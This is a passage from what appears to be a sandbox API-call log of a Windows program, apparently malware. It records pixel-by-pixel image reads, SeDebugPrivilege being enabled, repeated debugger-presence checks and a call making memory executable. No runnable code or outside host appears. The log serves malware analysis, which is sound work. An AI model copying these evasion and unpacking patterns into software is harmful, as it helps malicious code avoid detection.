[0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=198, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=199, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=200, color=0x52e3a0) returned 0x0 [0192.025] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.025] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.025] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=201, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=202, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=203, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=204, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=205, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=206, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=207, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=208, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=209, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=210, color=0x52e3a0) returned 0x0 [0192.026] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.026] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.026] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=211, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=212, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=213, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=214, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=215, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=216, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=217, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=218, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=219, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.027] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.027] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=220, color=0x52e3a0) returned 0x0 [0192.027] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=221, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=222, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=223, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=224, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=225, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=226, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=227, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=228, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=229, color=0x52e3a0) returned 0x0 [0192.028] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.028] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.028] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=230, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=231, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=232, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=233, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=234, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=235, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=236, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=237, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=238, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.029] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=239, color=0x52e3a0) returned 0x0 [0192.029] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.029] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=240, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=241, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=242, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=243, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=244, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=245, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=246, color=0x52e3a0) returned 0x0 [0192.030] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.030] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=247, color=0x52e3a0) returned 0x0 [0192.030] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=248, color=0x52e3a0) returned 0x0 [0192.415] GetCurrentProcessId () returned 0x718 [0192.417] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x52cdec | out: lpLuid=0x52cdec*(LowPart=0x14, HighPart=0)) returned 1 [0192.418] GetCurrentProcess () returned 0xffffffff [0192.418] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x52cde8 | out: TokenHandle=0x52cde8*=0x2a8) returned 1 [0192.419] AdjustTokenPrivileges (in: TokenHandle=0x2a8, DisableAllPrivileges=0, NewState=0x22a3bfc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0192.419] CloseHandle (hObject=0x2a8) returned 1 [0192.419] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2a8 [0192.420] GetExitCodeProcess (in: hProcess=0x2a8, lpExitCode=0x22a3b88 | out: lpExitCode=0x22a3b88*=0x103) returned 1 [0192.429] CheckRemoteDebuggerPresent (in: hProcess=0x2a8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.429] GetCurrentProcessId () returned 0x718 [0192.429] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x274 [0192.429] GetExitCodeProcess (in: hProcess=0x274, lpExitCode=0x22a3c9c | out: lpExitCode=0x22a3c9c*=0x103) returned 1 [0192.429] CheckRemoteDebuggerPresent (in: hProcess=0x274, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.429] GetCurrentProcessId () returned 0x718 [0192.429] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x268 [0192.430] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x22a3dec | out: lpExitCode=0x22a3dec*=0x103) returned 1 [0192.430] CheckRemoteDebuggerPresent (in: hProcess=0x268, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.430] GetCurrentProcessId () returned 0x718 [0192.430] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2ac [0192.430] GetExitCodeProcess (in: hProcess=0x2ac, lpExitCode=0x22a3ea4 | out: lpExitCode=0x22a3ea4*=0x103) returned 1 [0192.430] CheckRemoteDebuggerPresent (in: hProcess=0x2ac, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.430] GetCurrentProcessId () returned 0x718 [0192.430] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x278 [0192.430] GetExitCodeProcess (in: hProcess=0x278, lpExitCode=0x22a3f5c | out: lpExitCode=0x22a3f5c*=0x103) returned 1 [0192.430] CheckRemoteDebuggerPresent (in: hProcess=0x278, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.430] GetCurrentProcessId () returned 0x718 [0192.430] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x27c [0192.430] GetExitCodeProcess (in: hProcess=0x27c, lpExitCode=0x22a4014 | out: lpExitCode=0x22a4014*=0x103) returned 1 [0192.431] CheckRemoteDebuggerPresent (in: hProcess=0x27c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.431] GetCurrentProcessId () returned 0x718 [0192.431] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2b0 [0192.431] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0x22a40cc | out: lpExitCode=0x22a40cc*=0x103) returned 1 [0192.431] CheckRemoteDebuggerPresent (in: hProcess=0x2b0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.431] GetCurrentProcessId () returned 0x718 [0192.431] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x280 [0192.431] GetExitCodeProcess (in: hProcess=0x280, lpExitCode=0x22a4184 | out: lpExitCode=0x22a4184*=0x103) returned 1 [0192.431] CheckRemoteDebuggerPresent (in: hProcess=0x280, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.431] GetCurrentProcessId () returned 0x718 [0192.431] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x284 [0192.431] GetExitCodeProcess (in: hProcess=0x284, lpExitCode=0x22a423c | out: lpExitCode=0x22a423c*=0x103) returned 1 [0192.432] CheckRemoteDebuggerPresent (in: hProcess=0x284, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.432] GetCurrentProcessId () returned 0x718 [0192.432] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2b4 [0192.432] GetExitCodeProcess (in: hProcess=0x2b4, lpExitCode=0x22a42f4 | out: lpExitCode=0x22a42f4*=0x103) returned 1 [0192.432] CheckRemoteDebuggerPresent (in: hProcess=0x2b4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.432] GetCurrentProcessId () returned 0x718 [0192.432] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2c4 [0192.432] GetExitCodeProcess (in: hProcess=0x2c4, lpExitCode=0x22a43ac | out: lpExitCode=0x22a43ac*=0x103) returned 1 [0192.432] CheckRemoteDebuggerPresent (in: hProcess=0x2c4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.432] GetCurrentProcessId () returned 0x718 [0192.432] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2b8 [0192.432] GetExitCodeProcess (in: hProcess=0x2b8, lpExitCode=0x22a4464 | out: lpExitCode=0x22a4464*=0x103) returned 1 [0192.432] CheckRemoteDebuggerPresent (in: hProcess=0x2b8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.432] GetCurrentProcessId () returned 0x718 [0192.433] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x288 [0192.433] GetExitCodeProcess (in: hProcess=0x288, lpExitCode=0x22a451c | out: lpExitCode=0x22a451c*=0x103) returned 1 [0192.433] CheckRemoteDebuggerPresent (in: hProcess=0x288, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.433] GetCurrentProcessId () returned 0x718 [0192.433] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x28c [0192.433] GetExitCodeProcess (in: hProcess=0x28c, lpExitCode=0x22a45d4 | out: lpExitCode=0x22a45d4*=0x103) returned 1 [0192.433] CheckRemoteDebuggerPresent (in: hProcess=0x28c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.433] GetCurrentProcessId () returned 0x718 [0192.433] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2bc [0192.433] GetExitCodeProcess (in: hProcess=0x2bc, lpExitCode=0x22a468c | out: lpExitCode=0x22a468c*=0x103) returned 1 [0192.433] CheckRemoteDebuggerPresent (in: hProcess=0x2bc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.433] GetCurrentProcessId () returned 0x718 [0192.433] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x290 [0192.433] GetExitCodeProcess (in: hProcess=0x290, lpExitCode=0x22a4744 | out: lpExitCode=0x22a4744*=0x103) returned 1 [0192.434] CheckRemoteDebuggerPresent (in: hProcess=0x290, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.434] GetCurrentProcessId () returned 0x718 [0192.434] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2c0 [0192.434] GetExitCodeProcess (in: hProcess=0x2c0, lpExitCode=0x22a47fc | out: lpExitCode=0x22a47fc*=0x103) returned 1 [0192.434] CheckRemoteDebuggerPresent (in: hProcess=0x2c0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.434] GetCurrentProcessId () returned 0x718 [0192.434] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2cc [0192.434] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0x22a48b4 | out: lpExitCode=0x22a48b4*=0x103) returned 1 [0192.434] CheckRemoteDebuggerPresent (in: hProcess=0x2cc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.441] VirtualProtect (in: lpAddress=0x5880400, dwSize=0x64400, flNewProtect=0x40, lpflOldProtect=0x52d6d0 | out: lpflOldProtect=0x52d6d0*=0x0) returned 0 [0192.453] GetCurrentProcessId () returned 0x718 [0192.453] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x294 [0192.453] GetExitCodeProcess (in: hProcess=0x294, lpExitCode=0x22a496c | out: lpExitCode=0x22a496c*=0x103) returned 1 [0192.453] CheckRemoteDebuggerPresent (in: hProcess=0x294, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.453] GetCurrentProcessId () returned 0x718 [0192.453] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x298 [0192.453] GetExitCodeProcess (in: hProcess=0x298, lpExitCode=0x22a4a24 | out: lpExitCode=0x22a4a24*=0x103) returned 1 [0192.453] CheckRemoteDebuggerPresent (in: hProcess=0x298, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.454] GetCurrentProcessId () returned 0x718 [0192.454] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x29c [0192.454] GetExitCodeProcess (in: hProcess=0x29c, lpExitCode=0x22a4adc | out: lpExitCode=0x22a4adc*=0x103) returned 1 [0192.454] CheckRemoteDebuggerPresent (in: hProcess=0x29c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.454] GetCurrentProcessId () returned 0x718 [0192.454] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x2a0 [0192.454] GetExitCodeProcess (in: hProcess=0x2a0, lpExitCode=0x22a4b94 | out: lpExitCode=0x22a4b94*=0x103) returned 1 [0192.454] CheckRemoteDebuggerPresent (in: hProcess=0x2a0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.454] GetCurrentProcessId () returned 0x718 [0192.454] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x344 [0192.454] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x22a4c4c | out: lpExitCode=0x22a4c4c*=0x103) returned 1 [0192.454] CheckRemoteDebuggerPresent (in: hProcess=0x344, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.454] GetCurrentProcessId () returned 0x718 [0192.454] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x348 [0192.455] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x22a4d04 | out: lpExitCode=0x22a4d04*=0x103) returned 1 [0192.455] CheckRemoteDebuggerPresent (in: hProcess=0x348, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.455] GetCurrentProcessId () returned 0x718 [0192.455] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x358 [0192.455] GetExitCodeProcess (in: hProcess=0x358, lpExitCode=0x22a4dbc | out: lpExitCode=0x22a4dbc*=0x103) returned 1 [0192.455] CheckRemoteDebuggerPresent (in: hProcess=0x358, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.455] GetCurrentProcessId () returned 0x718 [0192.455] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x354 [0192.455] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x22a4e74 | out: lpExitCode=0x22a4e74*=0x103) returned 1 [0192.455] CheckRemoteDebuggerPresent (in: hProcess=0x354, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.455] GetCurrentProcessId () returned 0x718 [0192.455] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x35c [0192.455] GetExitCodeProcess (in: hProcess=0x35c, lpExitCode=0x22a4f2c | out: lpExitCode=0x22a4f2c*=0x103) returned 1 [0192.456] CheckRemoteDebuggerPresent (in: hProcess=0x35c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.456] GetCurrentProcessId () returned 0x718 [0192.456] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x360 [0192.456] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x22a4fe4 | out: lpExitCode=0x22a4fe4*=0x103) returned 1 [0192.456] CheckRemoteDebuggerPresent (in: hProcess=0x360, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.456] GetCurrentProcessId () returned 0x718 [0192.456] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x364 [0192.456] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x22a509c | out: lpExitCode=0x22a509c*=0x103) returned 1 [0192.456] CheckRemoteDebuggerPresent (in: hProcess=0x364, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.456] GetCurrentProcessId () returned 0x718 [0192.456] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x368 [0192.456] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x22a5154 | out: lpExitCode=0x22a5154*=0x103) returned 1 [0192.456] CheckRemoteDebuggerPresent (in: hProcess=0x368, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.457] GetCurrentProcessId () returned 0x718 [0192.457] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x36c [0192.457] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x22a520c | out: lpExitCode=0x22a520c*=0x103) returned 1 [0192.457] CheckRemoteDebuggerPresent (in: hProcess=0x36c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.457] GetCurrentProcessId () returned 0x718 [0192.457] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x370 [0192.457] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x22a52c4 | out: lpExitCode=0x22a52c4*=0x103) returned 1 [0192.457] CheckRemoteDebuggerPresent (in: hProcess=0x370, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.457] GetCurrentProcessId () returned 0x718 [0192.457] OpenProcess (dwDesiredAccess=0x1f0fff, 